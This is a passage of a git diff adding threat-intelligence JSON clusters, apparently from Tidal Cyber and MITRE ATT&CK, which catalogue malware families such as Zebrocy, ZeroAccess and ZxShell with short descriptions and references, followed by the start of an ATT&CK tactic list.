+ "software_attack_id": "S0388", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0a245c5e-c1a8-480f-8655-bb2594e3266b", + "type": "used-by" + }, + { + "dest-uuid": "cb444a16-3ea5-4a91-88c6-f329adcb8af3", + "type": "similar" + } + ], + "uuid": "0844bc42-5c29-47c3-b1b3-6bfffbf1732a", + "value": "YAHOYAH" + }, + { + "description": "[yty](https://app.tidalcyber.com/software/e0962ff7-5524-4683-9b95-0e4ba07dccb2) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. [[ASERT Donot March 2018](https://app.tidalcyber.com/references/a1b987cc-7789-411c-9673-3cf6357b207c)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0248", + "source": "MITRE", + "tags": [ + "16b47583-1c54-431f-9f09-759df7b5ddb7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "0817aaf2-afea-4c32-9285-4dcd1df5bf14", + "type": "similar" + } + ], + "uuid": "e0962ff7-5524-4683-9b95-0e4ba07dccb2", + "value": "yty" + }, + { + "description": "[[CyberScoop APT28 Nov 2018](https://app.tidalcyber.com/references/ef8f0990-b2da-4538-8b02-7401dc5a4120)][[Accenture SNAKEMACKEREL Nov 2018](https://app.tidalcyber.com/references/c38d021c-d84c-4aa7-b7a5-be47e18df1d8)]", + "meta": { + "id": "fcc6a2ed-c784-4851-a9af-9f0aaf741af1" + }, + "related": [ + { + "dest-uuid": "e317b8a6-1722-4017-be33-717a5a93ef1c", + "type": "similar" + } + ], + "uuid": "46252b99-2f81-4f99-9896-32fa41445351", + "value": "Zekapab" + }, + { + "description": "[Zebrocy](https://app.tidalcyber.com/software/e317b8a6-1722-4017-be33-717a5a93ef1c) is a Trojan that has been used by [APT28](https://app.tidalcyber.com/groups/5b1a5b9e-4722-41fc-a15d-196a549e3ac5) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [[Palo Alto Sofacy 06-2018](https://app.tidalcyber.com/references/a32357eb-3226-4bee-aeed-d2fbcfa52da0)][[Unit42 Cannon Nov 2018](https://app.tidalcyber.com/references/8c634bbc-4878-4b27-aa18-5996ec968809)][[Unit42 Sofacy Dec 2018](https://app.tidalcyber.com/references/540c4c33-d4c2-4324-94cd-f57646666e32)][[CISA Zebrocy Oct 2020](https://app.tidalcyber.com/references/b7518c4d-6c10-43d2-8e57-d354fb8d4a99)] ", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0251", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "5b1a5b9e-4722-41fc-a15d-196a549e3ac5", + "type": "used-by" + }, + { + "dest-uuid": "a4f57468-fbd5-49e4-8476-52088220b92d", + "type": "similar" + }, + { + "dest-uuid": "46252b99-2f81-4f99-9896-32fa41445351", + "type": "similar" + } + ], + "uuid": "e317b8a6-1722-4017-be33-717a5a93ef1c", + "value": "Zebrocy" + }, + { + "description": "[Zeroaccess](https://app.tidalcyber.com/software/2f52b513-5293-4833-9c4d-b120e7a84341) is a kernel-mode [Rootkit](https://app.tidalcyber.com/technique/cf2b56f6-3ebd-48ec-b9d9-835397acef89) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [[Sophos ZeroAccess](https://app.tidalcyber.com/references/41b51767-62f1-45c2-98cb-47c44c975a58)]", + "meta": { + "platforms": [], + "software_attack_id": "S0027", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "552462b9-ae79-49dd-855c-5973014e157f", + "type": "similar" + } + ], + "uuid": "2f52b513-5293-4833-9c4d-b120e7a84341", + "value": "Zeroaccess" + }, + { + "description": "[ZeroT](https://app.tidalcyber.com/software/f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd) is a Trojan used by [TA459](https://app.tidalcyber.com/groups/e343c1f1-458c-467b-bc4a-c1b97b2127e3), often in conjunction with [PlugX](https://app.tidalcyber.com/software/070b56f4-7810-4dad-b85f-bdfce9c08c10). [[Proofpoint TA459 April 2017](https://app.tidalcyber.com/references/dabad6df-1e31-4c16-9217-e079f2493b02)] [[Proofpoint ZeroT Feb 2017](https://app.tidalcyber.com/references/63787035-f136-43e1-b445-22853bbed92b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0230", + "source": "MITRE", + "tags": [ + "84615fe0-c2a5-4e07-8957-78ebc29b4635" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "e343c1f1-458c-467b-bc4a-c1b97b2127e3", + "type": "used-by" + }, + { + "dest-uuid": "4ab44516-ad75-4e43-a280-705dc0420e2f", + "type": "similar" + } + ], + "uuid": "f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd", + "value": "ZeroT" + }, + { + "description": "[Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://app.tidalcyber.com/software/be8add13-40d7-495e-91eb-258d3a4711bc)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.[[Talos Zeus Panda Nov 2017](https://app.tidalcyber.com/references/f96711d4-010d-4d7e-8074-31dd1b41c54d)][[GDATA Zeus Panda June 2017](https://app.tidalcyber.com/references/2d9a6957-5645-4863-968b-4a3c8736564b)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0330", + "source": "MITRE", + "tags": [ + "4d767e87-4cf6-438a-927a-43d2d0beaab7" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "198db886-47af-4f4c-bff5-11b891f85946", + "type": "similar" + } + ], + "uuid": "be8add13-40d7-495e-91eb-258d3a4711bc", + "value": "Zeus Panda" + }, + { + "description": "[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]", + "meta": { + "id": "09b25cb2-84f5-4f9e-90e8-37cda05feb68", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8", + "type": "similar" + } + ], + "uuid": "f50a78e0-2256-4642-b267-ecf746252c5a", + "value": "Zipfldr.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Compressed Folder library\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\zipfldr.dll\n* c:\\windows\\syswow64\\zipfldr.dll\n\n**Resources:**\n* [https://twitter.com/moriarty_meng/status/977848311603380224](https://twitter.com/moriarty_meng/status/977848311603380224)\n* [https://twitter.com/bohops/status/997896811904929792](https://twitter.com/bohops/status/997896811904929792)\n* [https://windows10dll.nirsoft.net/zipfldr_dll.html](https://windows10dll.nirsoft.net/zipfldr_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Zipfldr.dll - LOLBAS Project](/references/3bee0640-ea48-4164-be57-ac565d8cbea7)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5201", + "source": "Tidal Cyber", + "tags": [ + "0d0098b4-e159-4502-973d-714011ba605f", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "f50a78e0-2256-4642-b267-ecf746252c5a", + "type": "similar" + } + ], + "uuid": "34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8", + "value": "Zipfldr" + }, + { + "description": "[ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is a full-featured backdoor that was used as a second-stage implant during [Operation Dust Storm](https://app.tidalcyber.com/campaigns/af0c0f55-dc4f-4cb5-9350-3a2d7c07595f) since at least 2014. [ZLib](https://app.tidalcyber.com/software/1ac8d363-2903-43da-9c1d-2b28179638c8) is malware and should not be confused with the legitimate compression library from which its name is derived.[[Cylance Dust Storm](https://app.tidalcyber.com/references/001dd53c-74e6-4add-aeb7-da76b0d2afe8)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0086", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "166c0eca-02fd-424a-92c0-6b5106994d31", + "type": "similar" + } + ], + "uuid": "1ac8d363-2903-43da-9c1d-2b28179638c8", + "value": "ZLib" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "18204ba2-79ea-4170-aafe-7ee953c504c4" + }, + "related": [ + { + "dest-uuid": "75dd9acb-fcff-4b0b-b45b-f943fb589d78", + "type": "similar" + } + ], + "uuid": "3835527c-d5ce-43cc-92a6-2afee915dea6", + "value": "ZoxPNG" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "5713c24d-5e11-4ecd-9748-2ac2c49b6584" + }, + "related": [ + { + "dest-uuid": "75dd9acb-fcff-4b0b-b45b-f943fb589d78", + "type": "similar" + } + ], + "uuid": "7835d0eb-283d-409e-827f-89579dddb21c", + "value": "Gresim" + }, + { + "description": "[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "id": "ce7c5740-ac32-4556-b0a3-66de61acc094" + }, + "related": [ + { + "dest-uuid": "75dd9acb-fcff-4b0b-b45b-f943fb589d78", + "type": "similar" + } + ], + "uuid": "df7b9419-47dc-4a77-bad0-3892fe251260", + "value": "ZoxRPC" + }, + { + "description": "[Zox](https://app.tidalcyber.com/software/75dd9acb-fcff-4b0b-b45b-f943fb589d78) is a remote access tool that has been used by [Axiom](https://app.tidalcyber.com/groups/90f4d3f9-3fe3-4a64-8dc1-172c6d037dca) since at least 2008.[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0672", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "fb28627c-d6ea-4c35-b138-ab5e96ae5445", + "type": "similar" + }, + { + "dest-uuid": "3835527c-d5ce-43cc-92a6-2afee915dea6", + "type": "similar" + }, + { + "dest-uuid": "7835d0eb-283d-409e-827f-89579dddb21c", + "type": "similar" + }, + { + "dest-uuid": "df7b9419-47dc-4a77-bad0-3892fe251260", + "type": "similar" + } + ], + "uuid": "75dd9acb-fcff-4b0b-b45b-f943fb589d78", + "value": "Zox" + }, + { + "description": "[zwShell](https://app.tidalcyber.com/software/49314d4e-dc04-456f-918e-a3bedfc3192a) is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during [Night Dragon](https://app.tidalcyber.com/campaigns/85f136b3-d5a3-4c4c-a37c-40e4418dc989).[[McAfee Night Dragon](https://app.tidalcyber.com/references/242d2933-ca2b-4511-803a-454727a3acc5)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0350", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "54e8672d-5338-4ad1-954a-a7c986bee530", + "type": "similar" + } + ], + "uuid": "49314d4e-dc04-456f-918e-a3bedfc3192a", + "value": "zwShell" + }, + { + "description": "[[Talos ZxShell Oct 2014](https://app.tidalcyber.com/references/41c20013-71b3-4957-98f0-fb919014c93e)]", + "meta": { + "id": "c4b9dd8f-3c2c-4445-863d-abf4f1a75797" + }, + "related": [ + { + "dest-uuid": "eea89ff2-036d-4fa6-bbed-f89502c62318", + "type": "similar" + } + ], + "uuid": "9be660db-2271-4eed-9e9e-736b2a425a44", + "value": "Sensocode" + }, + { + "description": "[ZxShell](https://app.tidalcyber.com/software/eea89ff2-036d-4fa6-bbed-f89502c62318) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[[FireEye APT41 Aug 2019](https://app.tidalcyber.com/references/20f8e252-0a95-4ebd-857c-d05b0cde0904)][[Talos ZxShell Oct 2014](https://app.tidalcyber.com/references/41c20013-71b3-4957-98f0-fb919014c93e)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0412", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "4173c301-0307-458d-89dd-2583e94247ec", + "type": "used-by" + }, + { + "dest-uuid": "79be2f31-5626-425e-844c-fd9c99e38fe5", + "type": "used-by" + }, + { + "dest-uuid": "cfc75b0d-e579-40ae-ad07-a1ce00d49a6c", + "type": "similar" + }, + { + "dest-uuid": "9be660db-2271-4eed-9e9e-736b2a425a44", + "type": "similar" + } + ], + "uuid": "eea89ff2-036d-4fa6-bbed-f89502c62318", + "value": "ZxShell" + }, + { + "description": "[ZxxZ](https://app.tidalcyber.com/software/91e1ee26-d6ae-4203-a466-93c9e5019b47) is a trojan written in Visual C++ that has been used by [BITTER](https://app.tidalcyber.com/groups/3a02aa1b-851a-43e1-b83b-58037f3c7025) since at least August 2021, including against Bangladeshi government personnel.[[Cisco Talos Bitter Bangladesh May 2022](https://app.tidalcyber.com/references/097583ed-03b0-41cd-bf85-66d473f46439)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1013", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "3a02aa1b-851a-43e1-b83b-58037f3c7025", + "type": "used-by" + }, + { + "dest-uuid": "97cfbdc6-504d-41e9-a46c-78a9f806ff0d", + "type": "similar" + } + ], + "uuid": "91e1ee26-d6ae-4203-a466-93c9e5019b47", + "value": "ZxxZ" + } + ] +} diff --git a/clusters/tidal-tactic.json b/clusters/tidal-tactic.json new file mode 100644 index 0000000..ff4bdd9 --- /dev/null +++ b/clusters/tidal-tactic.json @@ -0,0 +1,3441 @@ +{ + "authors": "Tidal", + "category": "Tactic", + "description": "Tidal Tactic Cluster", + "name": "Tidal Tactic", + "source": "Tidal", + "type": "tactic", + "uuid": "43a8fce6-08d3-46c2-957d-53606efe2c48", + "values": [ + { + "description": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.", + "meta": { + "ordinal_position": 1, + "source": "MITRE", + "tactic_attack_id": "TA0043", + "tags": [] + }, + "related": [ + { + "dest-uuid": "4acf57da-73c1-4555-a86a-38ea4a8b962d", + "type": "uses" + }, + { + "dest-uuid": "8f707326-d673-43ee-b269-4b6eca5b190a", + "type": "uses" + }, + { + "dest-uuid": "56ab198f-f8bb-4fe9-bd85-5975d4d3863b", + "type": "uses" + }, + { + "dest-uuid": "5c3c8da1-ed0c-4b79-9794-c2fc55588ad9", + "type": "uses" + }, + { + "dest-uuid": "cb4ec901-fe61-4b44-8ad7-7d3d9a9bc809", + "type": "uses" + }, + { + "dest-uuid": "ef55dc56-f2eb-4a3b-a271-3f73b4700c89", + "type": "uses" + }, + { + "dest-uuid": "c55c0462-d59f-4bd8-9728-05cf711917b0", + "type": "uses" + }, + { + "dest-uuid": "758ad44d-5e29-4c7f-8dae-ddfeb5092ccb", + "type": "uses" + }, + { + "dest-uuid": "1f28a8a5-7231-47ad-9943-73b3cc6d05b0", + "type": "uses" + }, + { + "dest-uuid": "a5ab5108-1582-4357-b948-1c6148c7b5ce", + "type": "uses" + }, + { + "dest-uuid": "4a68c72c-79c1-4fed-9107-75bb5b06dfc3", + "type": "uses" + }, + { + "dest-uuid": "afe743a7-56b0-4ad1-bd36-dd50d64802fc", + "type": "uses" + }, + { + "dest-uuid": "454be621-ea64-409c-981f-809f1238e21c", + "type": "uses" + }, + { + "dest-uuid": "a150a804-1a17-45aa-a49f-d65ee901ab59", + "type": "uses" + }, + { + "dest-uuid": "aea36489-047e-4c4a-ab26-c51fd3556182", + "type": "uses" + }, + { + "dest-uuid": "c0a8e0d6-c108-4c15-9a3a-78ef1da06e32", + "type": "uses" + }, + { + "dest-uuid": "cf79ad1b-a82b-486b-88ad-e93bfc1c7439", + "type": "uses" + }, + { + "dest-uuid": "a930437d-5a12-4dc4-b311-f5fd6a766c85", + "type": "uses" + }, + { + "dest-uuid": "2eee984c-ea00-4284-b3eb-fd0c603a5a80", + "type": "uses" + }, + { + "dest-uuid": "c60e4f32-d8f0-49e8-b0f7-57a6ae35b8bb", + "type": "uses" + }, + { + "dest-uuid": "62bc11f9-f88c-437a-98ae-e90def576e7e", + "type": "uses" + }, + { + "dest-uuid": "9bd53629-fa2c-417d-b937-c575504be5b1", + "type": "uses" + }, + { + "dest-uuid": "2e4201da-fe83-439d-9d40-87e4c1f832fb", + "type": "uses" + }, + { + "dest-uuid": "72668851-bf65-42eb-a775-bc607f4520a2", + "type": "uses" + }, + { + "dest-uuid": "bc4f11b1-fd06-4e49-be48-e73ece82f1a9", + "type": "uses" + }, + { + "dest-uuid": "b18ddaf9-2939-45db-8b2a-2edecc2097ac", + "type": "uses" + }, + { + "dest-uuid": "d8dcce33-3a7e-4a1c-95c6-afdcf2fa1df6", + "type": "uses" + }, + { + "dest-uuid": "e55d2e4b-07d8-4c22-b543-c187be320578", + "type": "uses" + }, + { + "dest-uuid": "58776ca9-0c54-487f-afcc-e7e5b661bd54", + "type": "uses" + }, + { + "dest-uuid": "f2d216e3-43d6-4a2e-aa5b-d6be78d018b6", + "type": "uses" + }, + { + "dest-uuid": "40e4133b-28c2-4da7-9a6a-7392ae87f1da", + "type": "uses" + }, + { + "dest-uuid": "8af6a9ee-c323-44fa-85d3-29366fd1bb4f", + "type": "uses" + }, + { + "dest-uuid": "77476b73-f4d1-4689-8f9e-af08d27f4cba", + "type": "uses" + }, + { + "dest-uuid": "d97c3d34-1210-4c71-b305-59dcccab8f45", + "type": "uses" + }, + { + "dest-uuid": "e5d9c785-61bd-483f-b2ac-5bd9a8641b22", + "type": "uses" + }, + { + "dest-uuid": "a0e40412-cbfb-477b-87fc-40f2c84d26be", + "type": "uses" + }, + { + "dest-uuid": "63a99eb9-0da7-4286-bfc9-c306a03abf24", + "type": "uses" + }, + { + "dest-uuid": "b6fe2fda-9c05-4f05-b049-7bb5b9ba5b06", + "type": "uses" + }, + { + "dest-uuid": "473afdb8-5048-4838-a3fc-56be30be1e56", + "type": "uses" + }, + { + "dest-uuid": "ec145032-4b1b-4dbe-85bf-47360e35b0a3", + "type": "uses" + }, + { + "dest-uuid": "b39cc340-ee1d-46a8-add2-f36aade56f15", + "type": "uses" + }, + { + "dest-uuid": "d93b51df-014a-4d46-949a-4b8f796e6cca", + "type": "uses" + }, + { + "dest-uuid": "7f953df5-c91f-4975-a579-2be3c89bca7e", + "type": "uses" + }, + { + "dest-uuid": "113b8750-d166-5cac-bd26-2c82c90b9d88", + "type": "uses" + } + ], + "uuid": "2706dc98-724b-4cf0-84b6-56cc20b0698e", + "value": "Reconnaissance" + }, + { + "description": "The adversary is trying to establish resources they can use to support operations.\n\nResource Development consists of techniques that involve adversaries creating, purchasing, or compromising/stealing resources that can be used to support targeting. Such resources include infrastructure, accounts, or capabilities. These resources can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using purchased domains to support Command and Control, email accounts for phishing as a part of Initial Access, or stealing code signing certificates to help with Defense Evasion.", + "meta": { + "ordinal_position": 2, + "source": "MITRE", + "tactic_attack_id": "TA0042", + "tags": [] + }, + "related": [ + { + "dest-uuid": "66ce76fb-5e1b-4462-9b46-d59bdfc6d3f3", + "type": "uses" + }, + { + "dest-uuid": "c30faf84-496b-4f27-a4bc-aa36d583c69f", + "type": "uses" + }, + { + "dest-uuid": "4c0db4e5-14e0-4fb7-88b0-bb391ce5ad58", + "type": "uses" + }, + { + "dest-uuid": "bae33d7b-c835-4eda-b310-bf426270c0b1", + "type": "uses" + }, + { + "dest-uuid": "5bcbb0c5-7061-481f-a677-09028a6c59f7", + "type": "uses" + }, + { + "dest-uuid": "0f77a14a-d450-4885-b81f-23eeffa53a7e", + "type": "uses" + }, + { + "dest-uuid": "3426077d-3b9c-4f77-a1c6-d68f0dea670e", + "type": "uses" + }, + { + "dest-uuid": "fe96475a-3090-449d-91fd-ae73cb4d9c7c", + "type": "uses" + }, + { + "dest-uuid": "be637d66-5110-4872-bc15-63b062c3f290", + "type": "uses" + }, + { + "dest-uuid": "f2661f07-9027-4d19-9028-d07b7511f3d5", + "type": "uses" + }, + { + "dest-uuid": "6f152555-36a5-4ec9-8b9b-f0b32c3ccef8", + "type": "uses" + }, + { + "dest-uuid": "3bd8c928-a7c8-4376-8f2f-2e0fcb449b37", + "type": "uses" + }, + { + "dest-uuid": "4b187604-88ab-4972-9836-90a04c705e10", + "type": "uses" + }, + { + "dest-uuid": "49ae7bf1-a313-41d6-ad4c-74efc4c80ab6", + "type": "uses" + }, + { + "dest-uuid": "8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe", + "type": "uses" + }, + { + "dest-uuid": "b9f5f6b7-ecff-48c8-a23e-c58fd9e41a0d", + "type": "uses" + }, + { + "dest-uuid": "d7594eaf-286f-4484-94fa-8608c911767a", + "type": "uses" + }, + { + "dest-uuid": "6e4a0960-dcdc-4e42-9aa1-70d6fc3677b2", + "type": "uses" + }, + { + "dest-uuid": "1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb", + "type": "uses" + }, + { + "dest-uuid": "49c73c13-2281-45d3-af26-ad52a1cecb7a", + "type": "uses" + }, + { + "dest-uuid": "2c04d7c8-67a3-4b1a-bd71-47b7c5a54b23", + "type": "uses" + }, + { + "dest-uuid": "c12d81d3-abe4-43d7-8a65-f4b3150e722d", + "type": "uses" + }, + { + "dest-uuid": "c6374cbe-799a-4648-b1e2-2a66bb42d3f3", + "type": "uses" + }, + { + "dest-uuid": "66caa162-711c-44ac-b96d-0552cf328f84", + "type": "uses" + }, + { + "dest-uuid": "ec2a76e6-3530-43e1-9e80-686e4b214ac8", + "type": "uses" + }, + { + "dest-uuid": "6824c82b-2959-4402-831a-6e7c2010d1c5", + "type": "uses" + }, + { + "dest-uuid": "2e883e0d-1108-431a-a2dd-98ba98b69417", + "type": "uses" + }, + { + "dest-uuid": "4c7e52b1-9881-4966-b9b5-d88c5e88d604", + "type": "uses" + }, + { + "dest-uuid": "755c1883-4046-446b-a76a-88a842dd1c2c", + "type": "uses" + }, + { + "dest-uuid": "ef312a77-6b1a-4be6-a220-3c689e7fcd9d", + "type": "uses" + }, + { + "dest-uuid": "fe0bf22c-efb2-4bc6-96d8-e0e909502fd7", + "type": "uses" + }, + { + "dest-uuid": "5a57d258-0b23-431b-b50e-3150d2c0e52c", + "type": "uses" + }, + { + "dest-uuid": "0b2a9df9-65c8-4a01-a0e6-d411e54a4c7b", + "type": "uses" + }, + { + "dest-uuid": "83e4f633-67fb-4d87-b1b3-8a7a2e60778b", + "type": "uses" + }, + { + "dest-uuid": "9a2d6628-0dd7-4f25-a242-b752fcf47ff4", + "type": "uses" + }, + { + "dest-uuid": "a6740db8-10d6-4e5b-986b-7695d3fc4b85", + "type": "uses" + }, + { + "dest-uuid": "f2b5a3e4-8a59-41f5-88c4-142f2da251c8", + "type": "uses" + }, + { + "dest-uuid": "ce71e252-3403-4287-a0b5-9328fa88af96", + "type": "uses" + }, + { + "dest-uuid": "68d5de9f-ca86-4bd3-bf69-524d82f7bc7a", + "type": "uses" + }, + { + "dest-uuid": "8bdeddbe-14aa-412a-883a-7d6fe286c60e", + "type": "uses" + }, + { + "dest-uuid": "bf660248-2098-499b-b90c-8c47efb26c70", + "type": "uses" + }, + { + "dest-uuid": "8842e2e3-c4f8-446b-821b-5930cb15d30c", + "type": "uses" + }, + { + "dest-uuid": "581722ea-81a5-4c73-a703-2c994f1cf814", + "type": "uses" + }, + { + "dest-uuid": "60ac24aa-ce63-5c1d-8126-db20a27d85be", + "type": "uses" + }, + { + "dest-uuid": "478da817-1914-50f6-b1fd-434081a34354", + "type": "uses" + } + ], + "uuid": "989d09c2-12b8-4419-9b34-a328cf295fff", + "value": "Resource Development" + }, + { + "description": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.", + "meta": { + "ordinal_position": 3, + "source": "MITRE", + "tactic_attack_id": "TA0001", + "tags": [] + }, + "related": [ + { + "dest-uuid": "c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4", + "type": "uses" + }, + { + "dest-uuid": "590b55cd-7c6a-4207-b89a-3d7494623f00", + "type": "uses" + }, + { + "dest-uuid": "d08a9977-9fc2-46bb-84f9-dbb5187c426d", + "type": "uses" + }, + { + "dest-uuid": "ba553ad4-5699-4458-ae4e-76e1faa43291", + "type": "uses" + }, + { + "dest-uuid": "53fea37d-be26-4bed-a8a1-1d67f7cbffcf", + "type": "uses" + }, + { + "dest-uuid": "6a7ab25e-49ed-4cd3-b199-5d80b728b416", + "type": "uses" + }, + { + "dest-uuid": "b72c8a96-5e03-40c2-ac0c-f77b73fe493f", + "type": "uses" + }, + { + "dest-uuid": "4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a", + "type": "uses" + }, + { + "dest-uuid": "6c55cf9c-0259-4ba0-9574-e90f6c88e6fd", + "type": "uses" + }, + { + "dest-uuid": "7549c2f9-b5d2-4773-90ed-42f668aecacf", + "type": "uses" + }, + { + "dest-uuid": "d4a36624-50cb-43d3-95af-a2e10878a533", + "type": "uses" + }, + { + "dest-uuid": "a9b7eb2f-63e7-41bc-9d77-f7c4cede5406", + "type": "uses" + }, + { + "dest-uuid": "9953faea-d25d-4e6e-a132-8993535c5c14", + "type": "uses" + }, + { + "dest-uuid": "74b99029-3f0a-4cc8-90d6-5a6b177c06eb", + "type": "uses" + }, + { + "dest-uuid": "4557bfb9-b940-49b6-b8be-571979134419", + "type": "uses" + }, + { + "dest-uuid": "d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381", + "type": "uses" + }, + { + "dest-uuid": "3c4a2f3a-5877-4a27-a417-76318523657e", + "type": "uses" + }, + { + "dest-uuid": "165ba336-3eab-4809-b6fd-d0dcc5478f7f", + "type": "uses" + }, + { + "dest-uuid": "d2a19fd8-ff9c-4f9e-9e84-ed3ea12c4b7c", + "type": "uses" + }, + { + "dest-uuid": "3f95e4f2-cd4a-502c-a12a-becb8d28440c", + "type": "uses" + }, + { + "dest-uuid": "350c12a3-33f6-5942-8892-4d6e70abbfc1", + "type": "uses" + } + ], + "uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "value": "Initial Access" + }, + { + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a local or remote system. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data. For example, an adversary might use a remote access tool to run a PowerShell script that does Remote System Discovery. ", + "meta": { + "ordinal_position": 4, + "source": "MITRE", + "tactic_attack_id": "TA0002", + "tags": [] + }, + "related": [ + { + "dest-uuid": "723c6d51-91db-4658-9ee0-eafb953c2d82", + "type": "uses" + }, + { + "dest-uuid": "c37795d9-8970-461f-9491-3086d6b4b69a", + "type": "uses" + }, + { + "dest-uuid": "8941d1f4-d80c-4aaa-821a-a059c2a0f854", + "type": "uses" + }, + { + "dest-uuid": "8a669da8-8894-4fb0-9124-c3c8418985cc", + "type": "uses" + }, + { + "dest-uuid": "eb1a471e-e3b5-4790-8c0a-b89b68f244b9", + "type": "uses" + }, + { + "dest-uuid": "82497cfd-725e-42f8-aaa7-4e20878a6a13", + "type": "uses" + }, + { + "dest-uuid": "3412ca73-2f25-452a-8e6e-5c28fe72ef78", + "type": "uses" + }, + { + "dest-uuid": "803d286d-8104-4af8-9821-3f49240edc2b", + "type": "uses" + }, + { + "dest-uuid": "8bc683db-1311-476f-8cae-45f3f89dcc66", + "type": "uses" + }, + { + "dest-uuid": "0baf02af-ffaa-403f-9f0d-da51f463a1d8", + "type": "uses" + }, + { + "dest-uuid": "9f06ef9b-d587-41d3-8fc8-7d539dac5701", + "type": "uses" + }, + { + "dest-uuid": "1120f5ec-ef1b-4596-8d8b-a3979a766560", + "type": "uses" + }, + { + "dest-uuid": "2618638c-f6bd-4840-a297-c45076e094a9", + "type": "uses" + }, + { + "dest-uuid": "a2184d53-63b1-4c40-81ed-da799080c36c", + "type": "uses" + }, + { + "dest-uuid": 